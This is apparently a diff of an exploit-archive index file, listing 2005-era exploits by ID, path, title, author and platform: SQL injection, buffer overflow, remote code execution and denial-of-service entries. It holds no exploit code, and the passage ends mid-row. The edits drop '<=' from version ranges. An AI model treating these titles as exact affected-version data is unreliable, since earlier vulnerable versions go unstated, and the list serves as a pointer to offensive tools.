+1010,platforms/asp/webapps/1010.pl,"Maxwebportal 1.36 password.asp Change Password Exploit (3) (perl)",2005-05-26,Alpha_Programmer,asp,webapps,0 +1011,platforms/asp/webapps/1011.php,"Maxwebportal 1.36 password.asp Change Password Exploit (2) (php)",2005-05-26,mh_p0rtal,asp,webapps,0 +1012,platforms/asp/webapps/1012.txt,"Maxwebportal 1.36 password.asp Change Password Exploit (1) (html)",2005-05-26,"Soroush Dalili",asp,webapps,0 +1013,platforms/php/webapps/1013.pl,"Invision Power Board 2.0.3 - Login.php SQL Injection Exploit",2005-05-26,"Petey Beege",php,webapps,0 +1014,platforms/php/webapps/1014.txt,"Invision Power Board 2.0.3 - Login.php SQL Injection (tutorial)",2005-05-27,"Danica Jones",php,webapps,0 +1015,platforms/asp/webapps/1015.txt,"Hosting Controller 0.6.1 Unauthenticated User Registeration (3rd)",2005-05-27,"Soroush Dalili",asp,webapps,0 +1016,platforms/php/webapps/1016.pl,"phpStat 1.5 - (setup.php) Authentication Bypass Exploit (Perl)",2005-05-30,Alpha_Programmer,php,webapps,0 +1017,platforms/php/webapps/1017.php,"phpStat 1.5 - (setup.php) Authentication Bypass Exploit (PHP) (1)",2005-05-30,mh_p0rtal,php,webapps,0 +1018,platforms/php/webapps/1018.php,"phpStat 1.5 - (setup.php) Authentication Bypass Exploit (PHP) (2)",2005-05-30,Nikyt0x,php,webapps,0 1019,platforms/windows/local/1019.c,"Microsoft Windows - COM Structured Storage Local Exploit (MS05-012)",2005-05-31,"Cesar Cerrudo",windows,local,0 1020,platforms/php/webapps/1020.c,"Zeroboard 4.1 preg_replace Remote nobody Shell Exploit",2005-05-31,n0gada,php,webapps,0 -1021,platforms/linux/remote/1021.c,"Ethereal <= 0.10.10 - (SIP) Protocol Dissector Remote BoF Exploit",2005-05-31,"Team W00dp3ck3r",linux,remote,0 +1021,platforms/linux/remote/1021.c,"Ethereal 0.10.10 - (SIP) Protocol Dissector Remote BoF Exploit",2005-05-31,"Team W00dp3ck3r",linux,remote,0 1022,platforms/php/webapps/1022.pl,"MyBulletinBoard (MyBB) <= 1.00 RC4 - SQL Injection Exploit",2005-05-31,"Alberto Trivero",php,webapps,0 1023,platforms/php/webapps/1023.pl,"myBloggie 2.1.1 < 2.1.2 - SQL Injection Exploit",2005-05-31,"Alberto Trivero",php,webapps,0 1024,platforms/windows/dos/1024.html,"Microsoft Internet Explorer - Multiple Stack Overflows Crash",2005-05-31,"Benjamin Franz",windows,dos,0 1025,platforms/windows/dos/1025.html,"Microsoft Internet Explorer - javascript 'window()' Crash",2005-05-31,"Benjamin Franz",windows,dos,0 1026,platforms/windows/remote/1026.cpp,"e-Post SPA-PRO 4.01 - (imap) Remote Buffer Overflow Exploit",2005-06-02,"Jerome Athias",windows,remote,143 1027,platforms/windows/dos/1027.c,"FutureSoft TFTP Server 2000 - Remote Denial of Service Exploit",2005-06-02,ATmaCA,windows,dos,0 -1028,platforms/windows/remote/1028.c,"Crob FTP Server <= 3.6.1 - Remote Stack Overflow Exploit",2005-06-03,"Leon Juranic",windows,remote,0 -1029,platforms/linux/local/1029.c,"ePSXe <= 1.6.0 nogui() Local Exploit",2005-06-04,Qnix,linux,local,0 -1030,platforms/php/webapps/1030.pl,"PostNuke <= 0.750 readpmsg.php SQL Injection Exploit",2005-06-05,K-C0d3r,php,webapps,0 +1028,platforms/windows/remote/1028.c,"Crob FTP Server 3.6.1 - Remote Stack Overflow Exploit",2005-06-03,"Leon Juranic",windows,remote,0 +1029,platforms/linux/local/1029.c,"ePSXe 1.6.0 nogui() Local Exploit",2005-06-04,Qnix,linux,local,0 +1030,platforms/php/webapps/1030.pl,"PostNuke 0.750 readpmsg.php SQL Injection Exploit",2005-06-05,K-C0d3r,php,webapps,0 1031,platforms/php/webapps/1031.pl,"Portail PHP < 1.3 - SQL Injection Exploit",2005-06-06,"Alberto Trivero",php,webapps,0 1032,platforms/windows/local/1032.cpp,"Kaspersky AntiVirus - 'klif.sys' Privilege Escalation",2005-06-07,"Ilya Rabinovich",windows,local,0 -1033,platforms/php/webapps/1033.pl,"WordPress <= 1.5.1.1 - SQL Injection Exploit",2005-06-22,"Alberto Trivero",php,webapps,0 -1034,platforms/windows/local/1034.cpp,"WinZIP <= 8.1 Command Line Local Buffer Overflow Exploit",2005-06-07,ATmaCA,windows,local,0 +1033,platforms/php/webapps/1033.pl,"WordPress 1.5.1.1 - SQL Injection Exploit",2005-06-22,"Alberto Trivero",php,webapps,0 +1034,platforms/windows/local/1034.cpp,"WinZIP 8.1 Command Line Local Buffer Overflow Exploit",2005-06-07,ATmaCA,windows,local,0 1035,platforms/windows/remote/1035.c,"IPSwitch IMAP Server - LOGON Remote Stack Overflow",2005-06-07,nolimit,windows,remote,143 -1036,platforms/php/webapps/1036.php,"Invision Power Board <= 1.3.1 - Login.php SQL Injection",2005-06-08,anonymous,php,webapps,0 +1036,platforms/php/webapps/1036.php,"Invision Power Board 1.3.1 - Login.php SQL Injection",2005-06-08,anonymous,php,webapps,0 1037,platforms/multiple/dos/1037.c,"Tcpdump bgp_update_print Remote Denial of Service Exploit",2005-06-09,simon,multiple,dos,0 1038,platforms/linux/remote/1038.c,"GNU Mailutils imap4d 0.5 < 0.6.90 - Remote Format String Exploit",2005-06-10,qobaiashi,linux,remote,143 -1039,platforms/cgi/webapps/1039.pl,"Webhints <= 1.03 - Remote Command Execution Exploit (Perl) (1)",2005-06-11,Alpha_Programmer,cgi,webapps,0 -1040,platforms/cgi/webapps/1040.c,"Webhints <= 1.03 - Remote Command Execution Exploit (C) (2)",2005-06-11,Alpha_Programmer,cgi,webapps,0 -1041,platforms/cgi/webapps/1041.pl,"Webhints <= 1.03 - Remote Command Execution Exploit (Perl) (3)",2005-06-11,MadSheep,cgi,webapps,0 +1039,platforms/cgi/webapps/1039.pl,"Webhints 1.03 - Remote Command Execution Exploit (Perl) (1)",2005-06-11,Alpha_Programmer,cgi,webapps,0 +1040,platforms/cgi/webapps/1040.c,"Webhints 1.03 - Remote Command Execution Exploit (C) (2)",2005-06-11,Alpha_Programmer,cgi,webapps,0 +1041,platforms/cgi/webapps/1041.pl,"Webhints 1.03 - Remote Command Execution Exploit (Perl) (3)",2005-06-11,MadSheep,cgi,webapps,0 1043,platforms/osx/local/1043.c,"Mac OS X 10.4 launchd Race Condition Exploit",2005-06-14,intropy,osx,local,0 1044,platforms/aix/local/1044.c,"AIX 5.2 - netpmon Local Elevated Privileges Exploit",2005-06-14,intropy,aix,local,0 1045,platforms/aix/local/1045.c,"AIX 5.2 - ipl_varyon Local Elevated Privileges Exploit",2005-06-14,intropy,aix,local,0 @@ -859,95 +859,95 @@ id,file,description,date,author,platform,type,port 1047,platforms/linux/remote/1047.pl,"ViRobot Advanced Server 2.0 - (addschup) Remote Cookie Exploit",2005-06-14,"Kevin Finisterre",linux,remote,8080 1048,platforms/cgi/webapps/1048.pl,"eXtropia Shopping Cart web_store.cgi Remote Exploit",2005-06-15,"Action Spider",cgi,webapps,0 1049,platforms/php/webapps/1049.php,"Mambo 4.5.2.1 Fetch Password Hash Remote Exploit",2005-06-15,pokleyzz,php,webapps,0 -1050,platforms/php/webapps/1050.pl,"PHP Arena <= 1.1.3 pafiledb.php Remote Change Password Exploit",2005-06-15,Alpha_Programmer,php,webapps,0 -1051,platforms/php/webapps/1051.pl,"Ultimate PHP Board <= 1.9.6 GOLD users.dat Password Decryptor",2005-06-16,"Alberto Trivero",php,webapps,0 -1052,platforms/php/webapps/1052.php,"Claroline e-Learning <= 1.6 - Remote Hash SQL Injection Exploit",2005-06-17,mh_p0rtal,php,webapps,0 -1053,platforms/php/webapps/1053.pl,"Claroline e-Learning <= 1.6 - Remote Hash SQL Injection Exploit (2)",2005-06-19,K-C0d3r,php,webapps,0 -1055,platforms/linux/remote/1055.c,"PeerCast <= 0.1211 - Remote Format String Exploit",2005-06-20,darkeagle,linux,remote,7144 -1056,platforms/multiple/dos/1056.pl,"Apache <= 2.0.49 - Arbitrary Long HTTP Headers Denial of Service",2005-06-20,Qnix,multiple,dos,0 -1057,platforms/php/webapps/1057.pl,"Simple Machines Forum <= 1.0.4 - (modify) SQL Injection Exploit",2005-06-21,"James Bercegay",php,webapps,0 -1058,platforms/php/webapps/1058.pl,"MercuryBoard <= 1.1.4 - SQL Injection Exploit",2005-06-21,RusH,php,webapps,0 -1059,platforms/php/webapps/1059.pl,"WordPress <= 1.5.1.1 - 'add new admin' SQL Injection Exploit",2005-06-21,RusH,php,webapps,0 +1050,platforms/php/webapps/1050.pl,"PHP Arena 1.1.3 pafiledb.php Remote Change Password Exploit",2005-06-15,Alpha_Programmer,php,webapps,0 +1051,platforms/php/webapps/1051.pl,"Ultimate PHP Board 1.9.6 GOLD users.dat Password Decryptor",2005-06-16,"Alberto Trivero",php,webapps,0 +1052,platforms/php/webapps/1052.php,"Claroline e-Learning 1.6 - Remote Hash SQL Injection Exploit",2005-06-17,mh_p0rtal,php,webapps,0 +1053,platforms/php/webapps/1053.pl,"Claroline e-Learning 1.6 - Remote Hash SQL Injection Exploit (2)",2005-06-19,K-C0d3r,php,webapps,0 +1055,platforms/linux/remote/1055.c,"PeerCast 0.1211 - Remote Format String Exploit",2005-06-20,darkeagle,linux,remote,7144 +1056,platforms/multiple/dos/1056.pl,"Apache 2.0.49 - Arbitrary Long HTTP Headers Denial of Service",2005-06-20,Qnix,multiple,dos,0 +1057,platforms/php/webapps/1057.pl,"Simple Machines Forum 1.0.4 - (modify) SQL Injection Exploit",2005-06-21,"James Bercegay",php,webapps,0 +1058,platforms/php/webapps/1058.pl,"MercuryBoard 1.1.4 - SQL Injection Exploit",2005-06-21,RusH,php,webapps,0 +1059,platforms/php/webapps/1059.pl,"WordPress 1.5.1.1 - 'add new admin' SQL Injection Exploit",2005-06-21,RusH,php,webapps,0 1060,platforms/php/webapps/1060.pl,"Forum Russian Board 4.2 Full Command Execution Exploit",2005-06-21,RusH,php,webapps,0 -1061,platforms/php/webapps/1061.pl,"Mambo <= 4.5.2.1 - SQL Injection Exploit",2005-06-21,RusH,php,webapps,0 -1062,platforms/php/webapps/1062.pl,"Cacti <= 0.8.6d Remote Command Execution Exploit",2005-06-22,"Alberto Trivero",php,webapps,0 -1063,platforms/php/dos/1063.pl,"phpBB <= 2.0.15 - Register Multiple Users Denial of Service (Perl)",2005-06-22,g30rg3_x,php,dos,0 -1064,platforms/php/dos/1064.c,"phpBB <= 2.0.15 - Register Multiple Users Denial of Service (C)",2005-06-22,HaCkZaTaN,php,dos,0 +1061,platforms/php/webapps/1061.pl,"Mambo 4.5.2.1 - SQL Injection Exploit",2005-06-21,RusH,php,webapps,0 +1062,platforms/php/webapps/1062.pl,"Cacti 0.8.6d Remote Command Execution Exploit",2005-06-22,"Alberto Trivero",php,webapps,0 +1063,platforms/php/dos/1063.pl,"phpBB 2.0.15 - Register Multiple Users Denial of Service (Perl)",2005-06-22,g30rg3_x,php,dos,0 +1064,platforms/php/dos/1064.c,"phpBB 2.0.15 - Register Multiple Users Denial of Service (C)",2005-06-22,HaCkZaTaN,php,dos,0 1065,platforms/windows/dos/1065.c,"Microsoft Windows - (SMB) Transaction Response Handling Exploit (MS05-011)",2005-06-23,cybertronic,windows,dos,0 1066,platforms/windows/remote/1066.cpp,"Microsoft Outlook Express NNTP Buffer Overflow Exploit (MS05-030)",2005-06-24,eyas,windows,remote,0 -1067,platforms/windows/dos/1067.cpp,"TCP-IP Datalook <= 1.3 - Local Denial of Service Exploit",2005-06-25,basher13,windows,dos,0 -1068,platforms/php/webapps/1068.pl,"PHP-Fusion <= 6.00.105 Accessible Database Backups Download Exploit",2005-06-25,Easyex,php,webapps,0 +1067,platforms/windows/dos/1067.cpp,"TCP-IP Datalook 1.3 - Local Denial of Service Exploit",2005-06-25,basher13,windows,dos,0 +1068,platforms/php/webapps/1068.pl,"PHP-Fusion 6.00.105 Accessible Database Backups Download Exploit",2005-06-25,Easyex,php,webapps,0 1069,platforms/php/webapps/1069.php,"UBB Threads < 6.5.2 Beta (mailthread.php) SQL Injection Exploit",2005-06-25,mh_p0rtal,php,webapps,0 -1070,platforms/asp/webapps/1070.pl,"ASPNuke <= 0.80 - (article.asp) SQL Injection Exploit",2005-06-27,mh_p0rtal,asp,webapps,0 -1071,platforms/asp/webapps/1071.pl,"ASPNuke <= 0.80 - (comment_post.asp) SQL Injection Exploit",2005-06-27,"Alberto Trivero",asp,webapps,0 +1070,platforms/asp/webapps/1070.pl,"ASPNuke 0.80 - (article.asp) SQL Injection Exploit",2005-06-27,mh_p0rtal,asp,webapps,0 +1071,platforms/asp/webapps/1071.pl,"ASPNuke 0.80 - (comment_post.asp) SQL Injection Exploit",2005-06-27,"Alberto Trivero",asp,webapps,0 1072,platforms/multiple/dos/1072.cpp,"Stream / Raped - Denial of Service Attack (Windows)",2005-06-27,"Marco Del Percio",multiple,dos,0 1073,platforms/solaris/local/1073.c,"Solaris 9 / 10 - ld.so Local Root Exploit (1)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0 1074,platforms/solaris/local/1074.c,"Solaris 9 / 10 - ld.so Local Root Exploit (2)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0 1075,platforms/windows/remote/1075.c,"Microsoft Windows Message Queuing BoF Universal Exploit (MS05-017) (v.0.3)",2005-06-29,houseofdabus,windows,remote,2103 1076,platforms/php/webapps/1076.py,"phpBB 2.0.15 - (highlight) Remote PHP Code Execution",2005-06-29,rattle,php,webapps,0 -1077,platforms/php/webapps/1077.pl,"WordPress <= 1.5.1.2 - xmlrpc Interface SQL Injection Exploit",2005-06-30,"James Bercegay",php,webapps,0 -1078,platforms/php/webapps/1078.pl,"XML-RPC Library <= 1.3.0 - (xmlrpc.php) Remote Code Injection Exploit",2005-07-01,ilo--,php,webapps,0 +1077,platforms/php/webapps/1077.pl,"WordPress 1.5.1.2 - xmlrpc Interface SQL Injection Exploit",2005-06-30,"James Bercegay",php,webapps,0 +1078,platforms/php/webapps/1078.pl,"XML-RPC Library 1.3.0 - (xmlrpc.php) Remote Code Injection Exploit",2005-07-01,ilo--,php,webapps,0 1079,platforms/windows/remote/1079.html,"Microsoft Internet Explorer (javaprxy.dll) COM Object Remote Exploit",2005-07-05,k-otik,windows,remote,0 1080,platforms/php/webapps/1080.pl,"phpBB 2.0.15 - (highlight) Database Authentication Details Exploit",2005-07-03,SecureD,php,webapps,0 1081,platforms/hardware/remote/1081.c,"Nokia Affix < 3.2.0 - btftp Remote Client Exploit",2005-07-03,"Kevin Finisterre",hardware,remote,0 -1082,platforms/php/webapps/1082.pl,"XOOPS <= 2.0.11 xmlrpc.php SQL Injection Exploit",2005-07-04,RusH,php,webapps,0 -1083,platforms/php/webapps/1083.pl,"xmlrpc.php Library <= 1.3.0 - Remote Command Execute Exploit (2)",2005-07-04,dukenn,php,webapps,0 -1084,platforms/php/webapps/1084.pl,"xmlrpc.php Library <= 1.3.0 - Remote Command Execute Exploit (3)",2005-07-04,"Mike Rifone",php,webapps,0 +1082,platforms/php/webapps/1082.pl,"XOOPS 2.0.11 xmlrpc.php SQL Injection Exploit",2005-07-04,RusH,php,webapps,0 +1083,platforms/php/webapps/1083.pl,"xmlrpc.php Library 1.3.0 - Remote Command Execute Exploit (2)",2005-07-04,dukenn,php,webapps,0 +1084,platforms/php/webapps/1084.pl,"xmlrpc.php Library 1.3.0 - Remote Command Execute Exploit (3)",2005-07-04,"Mike Rifone",php,webapps,0 1085,platforms/windows/local/1085.c,"Willing Webcam 2.8 Licence Info Disclosure Local Exploit",2005-07-04,Kozan,windows,local,0 1086,platforms/windows/local/1086.c,"Access Remote PC 4.5.1 - Local Password Disclosure Exploit",2005-07-04,Kozan,windows,local,0 1087,platforms/bsd/local/1087.c,"Sudo 1.3.1 < 1.6.8p (OpenBSD) - Pathname Validation Local Root Exploit",2005-07-04,RusH,bsd,local,0 -1088,platforms/php/webapps/1088.pl,"Drupal <= 4.5.3 & <= 4.6.1 - Comments PHP Injection Exploit",2005-07-05,dab,php,webapps,0 -1089,platforms/windows/remote/1089.c,"Mozilla FireFox <= 1.0.1 - Remote GIF Heap Overflow Exploit",2005-07-05,darkeagle,windows,remote,0 +1088,platforms/php/webapps/1088.pl,"Drupal 4.5.3 <= 4.6.1 - Comments PHP Injection Exploit",2005-07-05,dab,php,webapps,0 +1089,platforms/windows/remote/1089.c,"Mozilla FireFox 1.0.1 - Remote GIF Heap Overflow Exploit",2005-07-05,darkeagle,windows,remote,0 1090,platforms/windows/dos/1090.cpp,"TCP Chat (TCPX) 1.0 - Denial of Service Exploit",2005-07-06,basher13,windows,dos,0 -1091,platforms/windows/local/1091.c,"Internet Download Manager <= 4.0.5 - Input URL Stack Overflow Exploit",2005-07-06,c0d3r,windows,local,0 +1091,platforms/windows/local/1091.c,"Internet Download Manager 4.0.5 - Input URL Stack Overflow Exploit",2005-07-06,c0d3r,windows,local,0 1092,platforms/solaris/local/1092.c,"Solaris SPARC / x86 - Local Socket Hijack Exploit",2005-07-06,c0ntex,solaris,local,0 -1093,platforms/windows/dos/1093.c,"PrivaShare <= 1.3 - Denial of Service Exploit",2005-07-07,basher13,windows,dos,0 -1094,platforms/windows/dos/1094.pl,"AnalogX SimpleServer:WWW <= 1.05 - Denial of Service Exploit",2005-07-07,Qnix,windows,dos,0 -1095,platforms/php/webapps/1095.txt,"phpBB <= 2.0.16 - XSS Remote Cookie Disclosure Exploit",2005-07-08,D|ablo,php,webapps,0 -1096,platforms/windows/remote/1096.txt,"Hosting Controller <= 0.6.1 HotFix 2.1 Change Credit Limit Exploit",2005-07-10,"Soroush Dalili",windows,remote,0 -1097,platforms/php/webapps/1097.txt,"BlogTorrent <= 0.92 - Remote Password Disclosure Exploit",2005-07-11,LazyCrs,php,webapps,0 -1099,platforms/windows/remote/1099.pl,"Baby Web Server <= 2.6.2 Command Validation Exploit",2005-07-11,basher13,windows,remote,0 -1100,platforms/windows/dos/1100.pl,"Remote File Explorer <= 1.0 - Denial of Service Exploit",2005-07-11,basher13,windows,dos,0 +1093,platforms/windows/dos/1093.c,"PrivaShare 1.3 - Denial of Service Exploit",2005-07-07,basher13,windows,dos,0 +1094,platforms/windows/dos/1094.pl,"AnalogX SimpleServer:WWW 1.05 - Denial of Service Exploit",2005-07-07,Qnix,windows,dos,0 +1095,platforms/php/webapps/1095.txt,"phpBB 2.0.16 - XSS Remote Cookie Disclosure Exploit",2005-07-08,D|ablo,php,webapps,0 +1096,platforms/windows/remote/1096.txt,"Hosting Controller 0.6.1 HotFix 2.1 Change Credit Limit Exploit",2005-07-10,"Soroush Dalili",windows,remote,0 +1097,platforms/php/webapps/1097.txt,"BlogTorrent 0.92 - Remote Password Disclosure Exploit",2005-07-11,LazyCrs,php,webapps,0 +1099,platforms/windows/remote/1099.pl,"Baby Web Server 2.6.2 Command Validation Exploit",2005-07-11,basher13,windows,remote,0 +1100,platforms/windows/dos/1100.pl,"Remote File Explorer 1.0 - Denial of Service Exploit",2005-07-11,basher13,windows,dos,0 1101,platforms/windows/dos/1101.c,"wMailServer 1.0 - Remote Denial of Service Exploit",2005-07-12,Kozan,windows,dos,0 -1102,platforms/windows/remote/1102.html,"Mozilla Firefox <= 1.0.4 - 'Set As Wallpaper' Code Execution Exploit",2005-07-13,"Michael Krax",windows,remote,0 -1103,platforms/php/webapps/1103.txt,"phpBB <= 2.0.16 - XSS Remote Cookie Disclosure Exploit (cookie grabber)",2005-07-13,"Sjaak Rake",php,webapps,0 +1102,platforms/windows/remote/1102.html,"Mozilla Firefox 1.0.4 - 'Set As Wallpaper' Code Execution Exploit",2005-07-13,"Michael Krax",windows,remote,0 +1103,platforms/php/webapps/1103.txt,"phpBB 2.0.16 - XSS Remote Cookie Disclosure Exploit (cookie grabber)",2005-07-13,"Sjaak Rake",php,webapps,0 1104,platforms/windows/dos/1104.cpp,"Microsoft Windows Netman Service Local Denial of Service Exploit",2005-07-14,bkbll,windows,dos,0 -1105,platforms/windows/dos/1105.c,"NetPanzer <= 0.8 - Remote Denial of Service Exploit",2005-07-14,"Luigi Auriemma",windows,dos,0 +1105,platforms/windows/dos/1105.c,"NetPanzer 0.8 - Remote Denial of Service Exploit",2005-07-14,"Luigi Auriemma",windows,dos,0 1106,platforms/php/webapps/1106.txt,"e107 <= 0.617 - XSS Remote Cookie Disclosure Exploit",2005-07-14,warlord,php,webapps,0 1107,platforms/windows/dos/1107.pl,"Remote Control Server 1.6.2 - Denial of Service Exploit",2005-07-15,basher13,windows,dos,0 -1108,platforms/windows/remote/1108.pl,"Small HTTP Server <= 3.05.28 - Arbitrary Data Execution Exploit",2005-07-15,basher13,windows,remote,0 -1109,platforms/windows/dos/1109.pl,"DzSoft PHP Editor <= 3.1.2.8 - Denial of Service Exploit",2005-07-15,basher13,windows,dos,0 +1108,platforms/windows/remote/1108.pl,"Small HTTP Server 3.05.28 - Arbitrary Data Execution Exploit",2005-07-15,basher13,windows,remote,0 +1109,platforms/windows/dos/1109.pl,"DzSoft PHP Editor 3.1.2.8 - Denial of Service Exploit",2005-07-15,basher13,windows,dos,0 1110,platforms/windows/dos/1110.txt,"Microsoft Internet Explorer / MSN ICC Profiles Crash PoC Exploit",2005-07-15,"Edward Gagnon",windows,dos,0 -1111,platforms/php/webapps/1111.pl,"Open Bulletin Board <= 1.0.5 - SQL Injection Exploit",2005-07-18,RusH,php,webapps,0 -1112,platforms/asp/webapps/1112.txt,"Hosting Controller <= 6.1 HotFix 2.2 Add Domain without Quota Exploit",2005-07-18,"Soroush Dalili",asp,webapps,0 +1111,platforms/php/webapps/1111.pl,"Open Bulletin Board 1.0.5 - SQL Injection Exploit",2005-07-18,RusH,php,webapps,0 +1112,platforms/asp/webapps/1112.txt,"Hosting Controller 6.1 HotFix 2.2 Add Domain without Quota Exploit",2005-07-18,"Soroush Dalili",asp,webapps,0 1113,platforms/php/webapps/1113.pm,"phpBB 2.0.15 - Remote PHP Code Execution Exploit (Metasploit)",2005-07-19,str0ke,php,webapps,0 1114,platforms/multiple/remote/1114.c,"HP OpenView OmniBack II Generic Remote Exploit",2000-12-21,DiGiT,multiple,remote,5555 1115,platforms/windows/remote/1115.pl,"Intruder Client 1.00 - Remote Command Execution & DoS Exploit",2005-07-21,basher13,windows,remote,0 1116,platforms/windows/dos/1116.c,"Microsoft Windows - Color Management Module Overflow Exploit (MS05-036)",2005-07-21,snooq,windows,dos,0 -1118,platforms/windows/remote/1118.c,"SlimFTPd <= 3.16 - Remote Buffer Overflow Exploit",2005-07-25,redsand,windows,remote,21 +1118,platforms/windows/remote/1118.c,"SlimFTPd 3.16 - Remote Buffer Overflow Exploit",2005-07-25,redsand,windows,remote,21 1119,platforms/multiple/local/1119.txt,"vim 6.3 < 6.3.082 - (modlines) Local Command Execution Exploit",2005-07-25,"Georgi Guninski",multiple,local,0 -1120,platforms/cgi/webapps/1120.pl,"FtpLocate <= 2.02 - (current) Remote Command Execution Exploit",2005-07-25,newbug,cgi,webapps,0 -1121,platforms/windows/dos/1121.pl,"FTPshell Server <= 3.38 - Remote Denial of Service Exploit",2005-07-26,"Reed Arvin",windows,dos,0 -1123,platforms/linux/remote/1123.c,"GNU Mailutils imap4d <= 0.6 - Remote Format String Exploit",2005-08-01,CoKi,linux,remote,143 -1124,platforms/linux/remote/1124.pl,"IPSwitch IMail Server <= 8.15 - IMAPD Remote Root Exploit",2005-08-01,kingcope,linux,remote,143 -1126,platforms/windows/dos/1126.c,"BusinessMail Server <= 4.60.00 - Remote Denial of Service Exploit",2005-08-01,Kozan,windows,dos,0 -1127,platforms/windows/dos/1127.cpp,"ProRat Server <= 1.9 (Fix-2) - Buffer Overflow Crash Exploit",2005-08-01,"evil dabus",windows,dos,0 +1120,platforms/cgi/webapps/1120.pl,"FtpLocate 2.02 - (current) Remote Command Execution Exploit",2005-07-25,newbug,cgi,webapps,0 +1121,platforms/windows/dos/1121.pl,"FTPshell Server 3.38 - Remote Denial of Service Exploit",2005-07-26,"Reed Arvin",windows,dos,0 +1123,platforms/linux/remote/1123.c,"GNU Mailutils imap4d 0.6 - Remote Format String Exploit",2005-08-01,CoKi,linux,remote,143 +1124,platforms/linux/remote/1124.pl,"IPSwitch IMail Server 8.15 - IMAPD Remote Root Exploit",2005-08-01,kingcope,linux,remote,143 +1126,platforms/windows/dos/1126.c,"BusinessMail Server 4.60.00 - Remote Denial of Service Exploit",2005-08-01,Kozan,windows,dos,0 +1127,platforms/windows/dos/1127.cpp,"ProRat Server 1.9 (Fix-2) - Buffer Overflow Crash Exploit",2005-08-01,"evil dabus",windows,dos,0 1128,platforms/windows/local/1128.c,"Microsoft Windows - (LegitCheckControl.dll) Genuine Advantage Validation Patch",2005-08-01,HaCkZaTaN,windows,local,0 -1129,platforms/windows/dos/1129.c,"Quick 'n EasY <= 3.0 FTP Server Remote Denial of Service Exploit",2005-08-02,Kozan,windows,dos,0 +1129,platforms/windows/dos/1129.c,"Quick 'n EasY 3.0 FTP Server Remote Denial of Service Exploit",2005-08-02,Kozan,windows,dos,0 1130,platforms/windows/remote/1130.c,"CA BrightStor ARCserve Backup Agent (dbasqlr.exe) Remote Exploit",2005-08-03,cybertronic,windows,remote,6070 1131,platforms/windows/remote/1131.c,"CA BrightStor ARCserve Backup (dsconfig.exe) Buffer Overflow",2005-08-03,cybertronic,windows,remote,41523 1132,platforms/windows/remote/1132.c,"CA BrightStor ARCserve Backup Auto Scanner / Exploiter",2005-08-03,cybertronic,windows,remote,6070 -1133,platforms/php/webapps/1133.pm,"vBulletin <= 3.0.6 - (Template) Command Execution Exploit (Metasploit)",2005-08-03,str0ke,php,webapps,0 -1134,platforms/php/webapps/1134.pl,"MySQL Eventum <= 1.5.5 - (login.php) SQL Injection Exploit",2005-08-05,"James Bercegay",php,webapps,0 -1135,platforms/php/webapps/1135.c,"PHP-Fusion <= 6.0 106 BBCode IMG Tag Script Injection Exploit",2005-08-05,Easyex,php,webapps,0 +1133,platforms/php/webapps/1133.pm,"vBulletin 3.0.6 - (Template) Command Execution Exploit (Metasploit)",2005-08-03,str0ke,php,webapps,0 +1134,platforms/php/webapps/1134.pl,"MySQL Eventum 1.5.5 - (login.php) SQL Injection Exploit",2005-08-05,"James Bercegay",php,webapps,0 +1135,platforms/php/webapps/1135.c,"PHP-Fusion 6.0 106 BBCode IMG Tag Script Injection Exploit",2005-08-05,Easyex,php,webapps,0 1137,platforms/windows/dos/1137.pl,"Acunetix HTTP Sniffer - Denial of Service Exploit",2005-08-05,basher13,windows,dos,0 -1138,platforms/linux/remote/1138.c,"nbSMTP <= 0.99 - 'util.c' Client-Side Command Execution Exploit",2005-08-05,CoKi,linux,remote,0 +1138,platforms/linux/remote/1138.c,"nbSMTP 0.99 - 'util.c' Client-Side Command Execution Exploit",2005-08-05,CoKi,linux,remote,0 1139,platforms/linux/remote/1139.c,"Ethereal 10.x AFP Protocol Dissector Remote Format String Exploit",2005-08-06,vade79,linux,remote,0 -1140,platforms/php/webapps/1140.php,"Flatnuke <= 2.5.5 - Remote Code Execution",2005-08-08,rgod,php,webapps,0 -1142,platforms/php/webapps/1142.php,"WordPress <= 1.5.1.3 - Remote Code Execution (0Day)",2005-08-09,Kartoffelguru,php,webapps,0 +1140,platforms/php/webapps/1140.php,"Flatnuke 2.5.5 - Remote Code Execution",2005-08-08,rgod,php,webapps,0 +1142,platforms/php/webapps/1142.php,"WordPress 1.5.1.3 - Remote Code Execution (0Day)",2005-08-09,Kartoffelguru,php,webapps,0 1143,platforms/windows/dos/1143.sys,"Microsoft Windows XP SP2 - (rdpwd.sys) Remote Kernel DoS Exploit",2005-08-09,"Tom Ferris",windows,dos,0 1144,platforms/windows/remote/1144.html,"Microsoft Internet Explorer (blnmgr.dll) COM Object Remote Exploit (MS05-038)",2005-08-09,FrSIRT,windows,remote,0 -1145,platforms/php/webapps/1145.pm,"WordPress <= 1.5.1.3 - Remote Code Execution exploit (Metasploit)",2005-08-10,str0ke,php,webapps,0 +1145,platforms/php/webapps/1145.pm,"WordPress 1.5.1.3 - Remote Code Execution exploit (Metasploit)",2005-08-10,str0ke,php,webapps,0 1146,platforms/windows/remote/1146.c,"Microsoft Windows Plug-and-Play Service Remote Overflow (MS05-039)",2005-08-11,sl0ppy,windows,remote,139 1147,platforms/windows/remote/1147.pm,"Veritas Backup Exec - Remote File Access Exploit (Windows) (Metasploit)",2005-08-11,anonymous,windows,remote,10000 1149,platforms/windows/remote/1149.c,"Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (MS05-039)",2005-08-12,houseofdabus,windows,remote,445 @@ -957,25 +957,25 @@ id,file,description,date,author,platform,type,port 1153,platforms/hardware/dos/1153.pl,"Grandstream Budge Tone 101/102 VOIP Phone Denial of Service Exploit",2005-08-12,"Pierre Kroma",hardware,dos,0 1154,platforms/linux/local/1154.pl,"Operator Shell (osh) 1.7-13 - Local Root Exploit",2005-08-16,"Charles Stevenson",linux,local,0 1156,platforms/windows/dos/1156.c,"Chris Moneymakers World Poker Championship 1.0 DoS Exploit",2005-08-17,"Luigi Auriemma",windows,dos,0 -1157,platforms/cgi/dos/1157.pl,"GTChat <= 0.95 Alpha - Remote Denial of Service Exploit",2005-08-18,RusH,cgi,dos,0 -1158,platforms/windows/dos/1158.pl,"WS_FTP Server <= 5.03 - (RNFR) Buffer Overflow Exploit",2004-11-29,"Reed Arvin",windows,dos,0 -1159,platforms/windows/dos/1159.pl,"Mercury/32 Mail Server <= 4.01a (check) Buffer Overflow Exploit",2004-12-01,"Reed Arvin",windows,dos,0 -1160,platforms/windows/dos/1160.pl,"Golden FTP Server Pro <= 2.52 - (USER) Remote Buffer Overflow Exploit",2005-04-27,"Reed Arvin",windows,dos,0 +1157,platforms/cgi/dos/1157.pl,"GTChat 